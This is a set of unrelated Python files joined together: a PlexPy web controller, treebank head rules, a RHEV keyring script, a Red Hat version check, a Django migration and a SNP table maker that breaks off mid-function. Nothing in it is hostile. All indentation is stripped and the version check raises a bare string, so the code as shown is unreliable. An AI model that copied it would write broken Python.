if (kwargs['monitoring_interval'] != str(plexpy.CONFIG.MONITORING_INTERVAL)) or \
(kwargs['refresh_users_interval'] != str(plexpy.CONFIG.REFRESH_USERS_INTERVAL)):
reschedule = True
if 'pms_ip' in kwargs:
if kwargs['pms_ip'] != plexpy.CONFIG.PMS_IP:
refresh_users = True
plexpy.CONFIG.process_kwargs(kwargs)
# Write the config
plexpy.CONFIG.write()
# Get new server URLs for SSL communications.
plextv.get_real_pms_url()
# Reconfigure scheduler if intervals changed
if reschedule:
plexpy.initialize_scheduler()
# Refresh users table if our server IP changes.
if refresh_users:
threading.Thread(target=plextv.refresh_users).start()
raise cherrypy.HTTPRedirect("settings")
@cherrypy.expose
def set_notification_config(self, **kwargs):
# Handle the variable config options. Note - keys with False values aren't getting passed
checked_configs = [
"email_tls"
]
for checked_config in checked_configs:
if checked_config not in kwargs:
# checked items should be zero or one. if they were not sent then the item was not checked
kwargs[checked_config] = 0
for plain_config, use_config in [(x[4:], x) for x in kwargs if x.startswith('use_')]:
# the use prefix is fairly nice in the html, but does not match the actual config
kwargs[plain_config] = kwargs[use_config]
del kwargs[use_config]
plexpy.CONFIG.process_kwargs(kwargs)
# Write the config
plexpy.CONFIG.write()
cherrypy.response.status = 200
@cherrypy.expose
def do_state_change(self, signal, title, timer):
message = title
quote = self.random_arnold_quotes()
plexpy.SIGNAL = signal
return serve_template(templatename="shutdown.html", title=title,
message=message, timer=timer, quote=quote)
@cherrypy.expose
def get_history(self, user=None, user_id=None, **kwargs):
custom_where=[]
if user_id:
custom_where = [['user_id', user_id]]
elif user:
custom_where = [['user', user]]
if 'rating_key' in kwargs:
rating_key = kwargs.get('rating_key', "")
custom_where = [['rating_key', rating_key]]
if 'parent_rating_key' in kwargs:
rating_key = kwargs.get('parent_rating_key', "")
custom_where = [['parent_rating_key', rating_key]]
if 'grandparent_rating_key' in kwargs:
rating_key = kwargs.get('grandparent_rating_key', "")
custom_where = [['grandparent_rating_key', rating_key]]
if 'start_date' in kwargs:
start_date = kwargs.get('start_date', "")
custom_where = [['strftime("%Y-%m-%d", datetime(date, "unixepoch", "localtime"))', start_date]]
data_factory = datafactory.DataFactory()
history = data_factory.get_history(kwargs=kwargs, custom_where=custom_where)
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(history)
@cherrypy.expose
def history_table_modal(self, start_date=None, **kwargs):
return serve_template(templatename="history_table_modal.html", title="History Data", data=start_date)
@cherrypy.expose
def shutdown(self):
return self.do_state_change('shutdown', 'Shutting Down', 15)
@cherrypy.expose
def restart(self):
return self.do_state_change('restart', 'Restarting', 30)
@cherrypy.expose
def update(self):
return self.do_state_change('update', 'Updating', 120)
@cherrypy.expose
def api(self, *args, **kwargs):
from plexpy.api import Api
a = Api()
a.checkParams(*args, **kwargs)
return a.fetchData()
@cherrypy.expose
def twitterStep1(self):
cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
tweet = notifiers.TwitterNotifier()
return tweet._get_authorization()
@cherrypy.expose
def twitterStep2(self, key):
cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
tweet = notifiers.TwitterNotifier()
result = tweet._get_credentials(key)
logger.info(u"result: " + str(result))
if result:
return "Key verification successful"
else:
return "Unable to verify key"
@cherrypy.expose
def testTwitter(self):
cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
tweet = notifiers.TwitterNotifier()
result = tweet.test_notify()
if result:
return "Tweet successful, check your twitter to make sure it worked"
else:
return "Error sending tweet"
@cherrypy.expose
def osxnotifyregister(self, app):
cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
from osxnotify import registerapp as osxnotify
result, msg = osxnotify.registerapp(app)
if result:
osx_notify = notifiers.OSX_NOTIFY()
osx_notify.notify('Registered', result, 'Success :-)')
logger.info('Registered %s, to re-register a different app, delete this app first' % result)
else:
logger.warn(msg)
return msg
@cherrypy.expose
def get_pms_token(self):
token = plextv.PlexTV()
result = token.get_token()
if result:
return result
else:
logger.warn('Unable to retrieve Plex.tv token.')
return False
@cherrypy.expose
def get_pms_sessions_json(self, **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_sessions('json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
return False
@cherrypy.expose
def get_current_activity(self, **kwargs):
try:
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_current_activity()
except:
return serve_template(templatename="current_activity.html", data=None)
if result:
return serve_template(templatename="current_activity.html", data=result)
else:
logger.warn('Unable to retrieve data.')
return serve_template(templatename="current_activity.html", data=None)
@cherrypy.expose
def get_current_activity_header(self, **kwargs):
try:
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_current_activity()
except IOError, e:
return serve_template(templatename="current_activity_header.html", data=None)
if result:
return serve_template(templatename="current_activity_header.html", data=result['stream_count'])
else:
logger.warn('Unable to retrieve data.')
return serve_template(templatename="current_activity_header.html", data=None)
@cherrypy.expose
def get_recently_added(self, count='0', **kwargs):
try:
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_recently_added_details(count)
except IOError, e:
return serve_template(templatename="recently_added.html", data=None)
if result:
return serve_template(templatename="recently_added.html", data=result['recently_added'])
else:
logger.warn('Unable to retrieve data.')
return serve_template(templatename="recently_added.html", data=None)
@cherrypy.expose
def pms_image_proxy(self, img='', width='0', height='0', fallback=None, **kwargs):
try:
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_image(img, width, height)
cherrypy.response.headers['Content-type'] = result[1]
return result[0]
except:
logger.warn('Image proxy queried but errors occured.')
if fallback == 'poster':
logger.info('Trying fallback image...')
try:
fallback_image = open(self.interface_dir + common.DEFAULT_POSTER_THUMB, 'rb')
cherrypy.response.headers['Content-type'] = 'image/png'
return fallback_image
except IOError, e:
logger.error('Unable to read fallback image. %s' % e)
elif fallback == 'cover':
logger.info('Trying fallback image...')
try:
fallback_image = open(self.interface_dir + common.DEFAULT_COVER_THUMB, 'rb')
cherrypy.response.headers['Content-type'] = 'image/png'
return fallback_image
except IOError, e:
logger.error('Unable to read fallback image. %s' % e)
return None
@cherrypy.expose
def info(self, item_id=None, source=None, **kwargs):
metadata = None
config = {
"pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER
}
if source == 'history':
data_factory = datafactory.DataFactory()
metadata = data_factory.get_metadata_details(row_id=item_id)
else:
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_metadata_details(rating_key=item_id)
if result:
metadata = result['metadata']
if metadata:
return serve_template(templatename="info.html", data=metadata, title="Info", config=config)
else:
logger.warn('Unable to retrieve data.')
return serve_template(templatename="info.html", data=None, title="Info")
@cherrypy.expose
def get_user_recently_watched(self, user=None, user_id=None, limit='10', **kwargs):
data_factory = datafactory.DataFactory()
result = data_factory.get_recently_watched(user_id=user_id, user=user, limit=limit)
if result:
return serve_template(templatename="user_recently_watched.html", data=result,
title="Recently Watched")
else:
logger.warn('Unable to retrieve data.')
return serve_template(templatename="user_recently_watched.html", data=None,
title="Recently Watched")
@cherrypy.expose
def get_user_watch_time_stats(self, user=None, user_id=None, **kwargs):
user_data = users.Users()
result = user_data.get_user_watch_time_stats(user_id=user_id, user=user)
if result:
return serve_template(templatename="user_watch_time_stats.html", data=result, title="Watch Stats")
else:
logger.warn('Unable to retrieve data.')
return serve_template(templatename="user_watch_time_stats.html", data=None, title="Watch Stats")
@cherrypy.expose
def get_user_platform_stats(self, user=None, user_id=None, **kwargs):
user_data = users.Users()
result = user_data.get_user_platform_stats(user_id=user_id, user=user)
if result:
return serve_template(templatename="user_platform_stats.html", data=result,
title="Platform Stats")
else:
logger.warn('Unable to retrieve data.')
return serve_template(templatename="user_platform_stats.html", data=None, title="Platform Stats")
@cherrypy.expose
def get_item_children(self, rating_key='', **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_item_children(rating_key)
if result:
return serve_template(templatename="info_children_list.html", data=result, title="Children List")
else:
logger.warn('Unable to retrieve data.')
return serve_template(templatename="info_children_list.html", data=None, title="Children List")
@cherrypy.expose
def get_metadata_json(self, rating_key='', **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_metadata(rating_key, 'json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_metadata_xml(self, rating_key='', **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_metadata(rating_key)
if result:
cherrypy.response.headers['Content-type'] = 'application/xml'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_recently_added_json(self, count='0', **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_recently_added(count, 'json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_episode_list_json(self, rating_key='', **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_episode_list(rating_key, 'json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_user_ips(self, user_id=None, user=None, **kwargs):
custom_where=[]
if user_id:
custom_where = [['user_id', user_id]]
elif user:
custom_where = [['user', user]]
user_data = users.Users()
history = user_data.get_user_unique_ips(kwargs=kwargs,
custom_where=custom_where)
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(history)
@cherrypy.expose
def get_plays_by_date(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_per_day(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plays_by_dayofweek(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_per_dayofweek(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plays_by_hourofday(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_per_hourofday(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plays_per_month(self, y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_per_month(y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plays_by_top_10_platforms(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_by_top_10_platforms(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plays_by_top_10_users(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_by_top_10_users(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plays_by_stream_type(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_per_stream_type(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plays_by_source_resolution(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_by_source_resolution(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plays_by_stream_resolution(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_total_plays_by_stream_resolution(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_stream_type_by_top_10_users(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_stream_type_by_top_10_users(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_stream_type_by_top_10_platforms(self, time_range='30', y_axis='plays', **kwargs):
graph = graphs.Graphs()
result = graph.get_stream_type_by_top_10_platforms(time_range=time_range, y_axis=y_axis)
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_friends_list(self, **kwargs):
plex_tv = plextv.PlexTV()
result = plex_tv.get_plextv_friends('json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_user_details(self, **kwargs):
plex_tv = plextv.PlexTV()
result = plex_tv.get_plextv_user_details('json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_server_list(self, **kwargs):
plex_tv = plextv.PlexTV()
result = plex_tv.get_plextv_server_list('json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_sync_lists(self, machine_id='', **kwargs):
plex_tv = plextv.PlexTV()
result = plex_tv.get_plextv_sync_lists(machine_id=machine_id, output_format='json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_servers(self, **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_server_list(output_format='json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_servers_info(self, **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_servers_info()
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_server_prefs(self, **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_server_prefs(output_format='json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_activity(self, **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_current_activity()
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_full_users_list(self, **kwargs):
plex_tv = plextv.PlexTV()
result = plex_tv.get_full_users_list()
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(result)
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def refresh_users_list(self, **kwargs):
threading.Thread(target=plextv.refresh_users).start()
logger.info('Manual user list refresh requested.')
@cherrypy.expose
def get_sync(self, machine_id=None, user_id=None, **kwargs):
pms_connect = pmsconnect.PmsConnect()
server_id = pms_connect.get_server_identity()
plex_tv = plextv.PlexTV()
if not machine_id:
result = plex_tv.get_synced_items(machine_id=server_id['machine_identifier'], user_id=user_id)
else:
result = plex_tv.get_synced_items(machine_id=machine_id, user_id=user_id)
if result:
output = {"data": result}
else:
logger.warn('Unable to retrieve sync data for user.')
output = {"data": []}
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(output)
@cherrypy.expose
def get_sync_item(self, sync_id, **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_sync_item(sync_id, output_format='json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_sync_transcode_queue(self, **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_sync_transcode_queue(output_format='json')
if result:
cherrypy.response.headers['Content-type'] = 'application/json'
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_server_pref(self, pref=None, **kwargs):
pms_connect = pmsconnect.PmsConnect()
result = pms_connect.get_server_pref(pref=pref)
if result:
return result
else:
logger.warn('Unable to retrieve data.')
@cherrypy.expose
def get_plexwatch_export_data(self, database_path=None, table_name=None, import_ignore_interval=0, **kwargs):
from plexpy import plexwatch_import
db_check_msg = plexwatch_import.validate_database(database=database_path,
table_name=table_name)
if db_check_msg == 'success':
threading.Thread(target=plexwatch_import.import_from_plexwatch,
kwargs={'database': database_path,
'table_name': table_name,
'import_ignore_interval': import_ignore_interval}).start()
return 'Import has started. Check the PlexPy logs to monitor any problems.'
else:
return db_check_msg
@cherrypy.expose
def plexwatch_import(self, **kwargs):
return serve_template(templatename="plexwatch_import.html", title="Import PlexWatch Database")
@cherrypy.expose
def get_server_id(self, hostname=None, port=None, **kwargs):
from plexpy import http_handler
if hostname and port:
request_handler = http_handler.HTTPHandler(host=hostname,
port=port,
token=None)
uri = '/identity'
request = request_handler.make_request(uri=uri,
proto='http',
request_type='GET',
output_format='',
no_token=True)
if request:
cherrypy.response.headers['Content-type'] = 'application/xml'
return request
else:
logger.warn('Unable to retrieve data.')
return None
else:
return None
@cherrypy.expose
def random_arnold_quotes(self, **kwargs):
from random import randint
quote_list = ['To crush your enemies, see them driven before you, and to hear the lamentation of their women!',
'Your clothes, give them to me, now!',
'Do it!',
'If it bleeds, we can kill it',
'See you at the party Richter!',
'Let off some steam, Bennett',
'I\'ll be back',
'Get to the chopper!',
'Hasta La Vista, Baby!',
'It\'s not a tumor!',
'Dillon, you son of a bitch!',
'Benny!! Screw you!!',
'Stop whining! You kids are soft. You lack discipline.',
'Nice night for a walk.',
'Stick around!',
'I need your clothes, your boots and your motorcycle.',
'No, it\'s not a tumor. It\'s not a tumor!',
'I LIED!',
'See you at the party, Richter!',
'Are you Sarah Conner?',
'I\'m a cop you idiot!',
'Come with me if you want to live.',
'Who is your daddy and what does he do?'
]
random_number = randint(0, len(quote_list) - 1)
return quote_list[int(random_number)]
@cherrypy.expose
def get_notification_agent_config(self, config_id, **kwargs):
config = notifiers.get_notification_agent_config(config_id=config_id)
checkboxes = {'email_tls': checked(plexpy.CONFIG.EMAIL_TLS)}
return serve_template(templatename="notification_config.html", title="Notification Configuration",
data=config, checkboxes=checkboxes)
@cherrypy.expose
def get_notification_agent_triggers(self, config_id, **kwargs):
if config_id.isdigit():
agents = notifiers.available_notification_agents()
for agent in agents:
if int(config_id) == agent['id']:
this_agent = agent
break
else:
this_agent = None
else:
return None
return serve_template(templatename="notification_triggers_modal.html", title="Notification Triggers",
data=this_agent)
@cherrypy.expose
def delete_history_rows(self, row_id, **kwargs):
data_factory = datafactory.DataFactory()
if row_id:
delete_row = data_factory.delete_session_history_rows(row_id=row_id)
if delete_row:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps({'message': delete_row})
else:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps({'message': 'no data received'})
@cherrypy.expose
def delete_all_user_history(self, user_id, **kwargs):
data_factory = datafactory.DataFactory()
if user_id:
delete_row = data_factory.delete_all_user_history(user_id=user_id)
if delete_row:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps({'message': delete_row})
else:
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps({'message': 'no data received'})
|
"""treetools: Tools for transforming treebank trees.
transformations: constants and utilities
Author: Wolfgang Maier <maierw@hhu.de>
"""
from . import trees
HEAD_RULES_PTB = {
'adjp' : [('left-to-right', 'nns qp nn $ advp jj vbn vbg adjp jjr np jjs dt fw rbr rbs sbar rb')],
'advp' : [('right-to-left', 'rb rbr rbs fw advp to cd jjr jj in np jjs nn')],
'conjp' : [('right-to-left', 'cc rb in')],
'frag' : [('right-to-left', '')],
'intj' : [('left-to-right', '')],
'lst' : [('right-to-left', 'ls :')],
'nac' : [('left-to-right', 'nn nns nnp nnps np nac ex $ cd qp prp vbg jj jjs jjr adjp fw')],
'pp' : [('right-to-left', 'in to vbg vbn rp fw')],
'prn' : [('left-to-right', '')],
'prt' : [('right-to-left', 'rp')],
'qp' : [('left-to-right', ' $ in nns nn jj rb dt cd ncd qp jjr jjs')],
'rrc' : [('right-to-left', 'vp np advp adjp pp')],
's' : [('left-to-right', ' to in vp s sbar adjp ucp np')],
'sbar' : [('left-to-right', 'whnp whpp whadvp whadjp in dt s sq sinv sbar frag')],
'sbarq' : [('left-to-right', 'sq s sinv sbarq frag')],
'sinv' : [('left-to-right', 'vbz vbd vbp vb md vp s sinv adjp np')],
'sq' : [('left-to-right', 'vbz vbd vbp vb md vp sq')],
'ucp' : [('right-to-left', '')],
'vp' : [('left-to-right', 'to vbd vbn md vbz vb vbg vbp vp adjp nn nns np')],
'whadjp' : [('left-to-right', 'cc wrb jj adjp')],
'whadvp' : [('right-to-left', 'cc wrb')],
'whnp' : [('left-to-right', 'wdt wp wp$ whadjp whpp whnp')],
'whpp' : [('right-to-left', 'in to fw')]
}
HEAD_RULES_NEGRA = {
's' : [('right-to-left', 'vvfin vvimp'),
('right-to-left', 'vp cvp'),
('right-to-left', 'vmfin vafin vaimp'),
('right-to-left', 's cs')],
'vp' : [('right-to-left', 'vvinf vvizu vvpp'),
('right-to-left', 'vz vainf vminf vmpp vapp pp')],
'vz' : [('right-to-left', 'vvinf vainf vminf vvfin vvizu'),
('left-to-right', 'prtzu appr ptkzu')],
'np' : [('right-to-left', 'nn ne mpn np cnp pn car')],
'ap' : [('right-to-left', 'adjd adja cap aa adv')],
'pp' : [('left-to-right', 'kokom appr proav')],
'co' : [('left-to-right', '')],
'avp' : [('right-to-left', 'adv avp adjd proav pp')],
'aa' : [('right-to-left', 'adjd adja')],
'cnp' : [('right-to-left', 'nn ne mpn np cnp pn car')],
'cap' : [('right-to-left', 'adjd adja cap aa adv')],
'cpp' : [('right-to-left', 'appr proav pp cpp')],
'cs' : [('right-to-left', 's cs')],
'cvp' : [('right-to-left', 'vz')],
'cvz' : [('right-to-left', 'vz')],
'cavp' : [('right-to-left', 'adv avp adjd pwav appr ptkvz')],
'mpn' : [('right-to-left', 'ne fm card')],
'nm' : [('right-to-left', 'card nn')],
'cac' : [('right-to-left', 'appr avp')],
'ch' : [('right-to-left', '')],
'mta' : [('right-to-left', 'adja adjd nn')],
'ccp' : [('right-to-left', 'avp')],
'dl' : [('left-to-right', '')],
'isu' : [('right-to-left', '')],
'ql' : [('right-to-left', '')],
'-' : [('right-to-left', 'pp')],
'cd' : [('right-to-left', 'cd')],
'nn' : [('right-to-left', 'nn')],
'nr' : [('right-to-left', 'nr')],
'vroot' : [('left-to-right', '$. $')]
}
def get_headpos_by_rule(parent_label, children_label, rules,
default=0):
"""Given parent and children labels and head rules,
return position of lexical head.
"""
if not parent_label.lower() in rules:
return default
for hrule in rules[parent_label.lower()]:
if len(hrule[1]) == 0:
if hrule[0] == 'left-to-right':
return len(children_label) - 1
elif hrule[0] == 'right-to_left':
return 0
else:
raise ValueError("unknown head rule direction")
for label in hrule[1]:
if hrule[0] == 'left-to-right':
for i, child_label in enumerate(children_label):
parsed_label = trees.parse_label(child_label.lower())
if parsed_label.label.lower() == label:
return i
elif hrule[0] == 'right-to-left':
for i, child_label in \
zip(reversed(range(len(children_label))),
reversed(children_label)):
parsed_label = trees.parse_label(child_label.lower())
if parsed_label.label.lower() == label:
return i
return 0
else:
raise ValueError("unknown head rule direction")
return 0
|
import optparse
import keyring
from rhev_functions import *
description = """
RHEV-keyring is a script for mantaining the keyring used by rhev script for storing password
"""
p = optparse.OptionParser("rhev-clone.py [arguments]", description=description)
p.add_option("-u", "--user", dest="username", help="Username to connect to RHEVM API", metavar="admin@internal",
default=False)
p.add_option("-w", "--password", dest="password", help="Password to use with username", metavar="admin",
default=False)
p.add_option("-W", action="store_true", dest="askpassword", help="Ask for password", metavar="admin", default=False)
p.add_option('-q', "--query", action="store_true", dest="query", help="Query the values stored", default=False)
(options, args) = p.parse_args()
if options.askpassword:
options.password = getpass.getpass("Enter password: ")
if options.query:
print "Username: %s" % keyring.get_password('rhevm-utils', 'username')
print "Password: %s" % keyring.get_password('rhevm-utils', 'password')
if options.username:
keyring.set_password('rhevm-utils', 'username', options.username)
if options.password:
keyring.set_password('rhevm-utils', 'password', options.password)
|
import os,sys,re
RELEASE_FILE = "/etc/redhat-release"
RWM_FILE = "/etc/httpd/conf.modules.d/00-base.conf"
if os.path.isfile(RELEASE_FILE):
f=open(RELEASE_FILE,"r")
rel_list = f.read().split()
if rel_list[2] == "release" and tuple(rel_list[3].split(".")) < ('8','5'):
print("so far good")
else:
raise("Unable to find the OS version")
if os.path.isfile(RWM_FILE):
print("re write")
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('catalogue', '0014_auto_20170414_0845'),
]
operations = [
migrations.AlterField(
model_name='jeux',
name='image',
field=models.ImageField(null=True, upload_to='photos_jeux/', verbose_name='Image'),
),
]
|
import os
import random
__author__ = 'duceppemo'
class SnpTableMaker(object):
"""
Everything is ran inside the class because data structures have to be
shared across parent and child process during multi threading
"""
def __init__(self, args):
import os
import sys
import glob
import multiprocessing
# Define variables based on supplied arguments
self.args = args
self.ref = args.ref
if not os.path.isfile(self.ref):
sys.exit('Supplied reference genome file does not exists.')
self.vcf = args.vcf
if not os.path.isdir(self.vcf):
sys.exit('Supplied VCF folder does not exists.')
self.minQUAL = args.minQUAL
if not isinstance(self.minQUAL, (int, long)):
sys.exit('minQual value must be an integer')
self.ac1_report = args.ac1
self.section4 = args.section4
self.output = args.output
if not os.path.isdir(self.output):
os.makedirs(self.output)
self.table = args.table
# number of threads to use = number of cpu
self.cpus = int(multiprocessing.cpu_count())
# create dictionaries to hold data
self.refgenome = dict()
self.vcfs = dict()
self.ac1s = dict()
self.ac2s = dict()
self.allac2 = dict()
self.finalac1 = dict()
self.fastas = dict()
self.counts = dict()
self.informative_pos = dict()
# create a list of vcf files in vcfFolder
self.vcfList = list()
for filename in glob.glob(os.path.join(self.vcf, '*.vcf')):
self.vcfList.append(filename)
# run the script
self.snp_table_maker()
def snp_table_maker(self):
self.parse_ref()
self.parse_vcf()
self.find_ac1_in_ac2()
self.write_ac1_report()
self.get_allele_values()
self.get_informative_snps()
self.count_snps()
self.write_fasta()
self.write_root()
self.write_snp_table()
def parse_ref(self):
from Bio import SeqIO
print ' Parsing reference genome'
fh = open(self.ref, "rU")
self.refgenome = SeqIO.to_dict(SeqIO.parse(fh, "fasta"))
fh.close()
def parse_vcf(self):
import sys
print ' Parsing VCF files'
for samplefile in self.vcfList:
sample = os.path.basename(samplefile).split('.')[0] # get what's before the first dot
self.vcfs[sample] = dict()
with open(samplefile, 'r') as f: # open file
for line in f: # read file line by line
line = line.rstrip() # chomp -> remove trailing whitespace characters
if line: # skip blank lines or lines with only whitespaces
if line.startswith('##'): # skip comment lines
continue
elif line.startswith('#CHROM'):
sample_name = line.split("\t")[9]
if sample_name != sample:
sys.exit('File name and sample name inside VCF file are different: %s'
% samplefile)
else:
# chrom, pos, alt, qual = [line.split()[i] for i in (0, 1, 4, 5)]
chrom = line.split()[0]
pos = int(line.split()[1])
alt = line.split()[4]
qual = line.split()[5] # string -> needs to be converted to integer
if qual != '.':
try:
qual = float(qual)
except ValueError:
qual = int(qual)
else:
continue # skip line
ac = line.split()[7].split(';')[0]
# http://www.saltycrane.com/blog/2010/02/python-setdefault-example/
self.vcfs.setdefault(sample, {}).setdefault(chrom, {}).setdefault(pos, [])\
.append(alt)
if ac == 'AC=1' and qual > self.args.minQUAL:
self.ac1s.setdefault(sample, {}).setdefault(chrom, []).append(pos)
elif ac == 'AC=2' and qual > self.args.minQUAL:
self.ac2s.setdefault(sample, {}).setdefault(chrom, []).append(pos)
# This is equivalent, but faster?
try:
if pos not in self.allac2[chrom]: # only add is not already present
self.allac2.setdefault(chrom, []).append(pos)
except KeyError: # chromosome does not exist in dictionary
self.allac2.setdefault(chrom, []).append(pos)
# This works
# if chrom in self.allac2:
# if pos in self.allac2[chrom]:
# pass
# else:
# self.allac2.setdefault(chrom, []).append(pos)
# else:
# self.allac2.setdefault(chrom, [])
def find_ac1_in_ac2(self):
print ' Finding AC=1/AC=2 positions'
if isinstance(self.ac1s, dict): # check if it's a dict before using .iteritems()
for sample, chromosomes in self.ac1s.iteritems():
if isinstance(chromosomes, dict): # check for dict
for chrom, positions in chromosomes.iteritems():
if isinstance(positions, list): # check for list
for pos in positions:
if pos in self.allac2[chrom]: # check ac1 in ac2
self.finalac1.setdefault(sample, {}).setdefault(chrom, []).append(pos)
def write_ac1_report(self):
print " Writing AC=1/AC=2 report to file"
# free up resources not needed anymore
self.ac1s.clear()
fh = open(self.ac1_report, 'w')
if isinstance(self.finalac1, dict):
for sample, chromosomes in sorted(self.finalac1.iteritems()):
if isinstance(chromosomes, dict):
for chrom, positions in sorted(chromosomes.iteritems()):
if isinstance(positions, list):
fh.write("{}\nAC=1 is also found in AC=2 in chromosome {}".format(sample, chrom) +
" at position(s): " + ', '.join(map(str, positions)) + "\n\n")
fh.close()
def get_allele_values(self):
print ' Getting allele values'
for sample in self.ac2s:
for chrom in self.ac2s[sample]:
for pos in self.allac2[chrom]:
# if in AC=2 for that sample
if pos in self.ac2s[sample][chrom]:
allele = ''.join(self.vcfs[sample][chrom][pos]) # convert list to string
else:
try: # use a try here because some samples are not in finalac1
# if in AC=1 for that sample, but also in AC=2 in other sample
if pos in self.finalac1[sample][chrom]:
